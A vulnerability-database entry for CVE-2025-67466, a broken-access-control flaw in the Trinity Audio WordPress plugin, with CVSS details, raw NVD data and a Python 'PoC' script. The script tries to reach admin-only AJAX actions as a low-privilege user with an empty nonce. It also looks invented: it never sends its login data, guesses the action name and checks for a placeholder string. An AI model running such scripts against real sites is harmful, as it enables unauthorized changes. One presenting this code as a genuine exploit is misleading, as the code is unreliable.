Security Vulnerability Report
中文
CVE-2025-67466 CVSS 4.3 MEDIUM

CVE-2025-67466

Published: 2025-12-09 16:18:23
Last Modified: 2026-04-27 18:16:39

Description

Missing Authorization vulnerability in sergiotrinity Trinity Audio trinity-audio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Trinity Audio: from n/a through <= 5.23.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Trinity Audio WordPress Plugin <= 5.23.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67466 PoC - Trinity Audio Plugin Broken Access Control # Target: WordPress site with Trinity Audio plugin <= 5.23.3 TARGET_URL = "http://target-wordpress-site.com" # Identify vulnerable endpoint (requires enumeration) vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/trinity-audio/v1/", "/?rest_route=/trinity-audio/v1/" ] def check_vulnerability(target): """Check if target is vulnerable to CVE-2025-67466""" # Low-privilege user session (subscriber role) session = requests.Session() # Login as low-privilege user login_data = { "log": "low_priv_user", "pwd": "password", "wp-submit": "Log In" } # Attempt to access admin-only functionality # Replace 'action_name' with actual vulnerable action exploit_data = { "action": "trinity_audio_admin_action", "nonce": "", "post_id": "1" } response = session.post( f"{target}/wp-admin/admin-ajax.php", data=exploit_data ) # Check for successful unauthorized access if response.status_code == 200 and "sensitive_data" in response.text: print("[+] VULNERABLE: Unauthorized access confirmed") return True print("[-] Not vulnerable or access denied") return False # Note: Actual PoC requires identifying specific vulnerable endpoints # Refer to Patchstack advisory for complete technical details

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67466", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:22.613", "lastModified": "2026-04-27T18:16:39.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in sergiotrinity Trinity Audio trinity-audio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Trinity Audio: from n/a through <= 5.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/trinity-audio/vulnerability/wordpress-trinity-audio-plugin-5-23-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}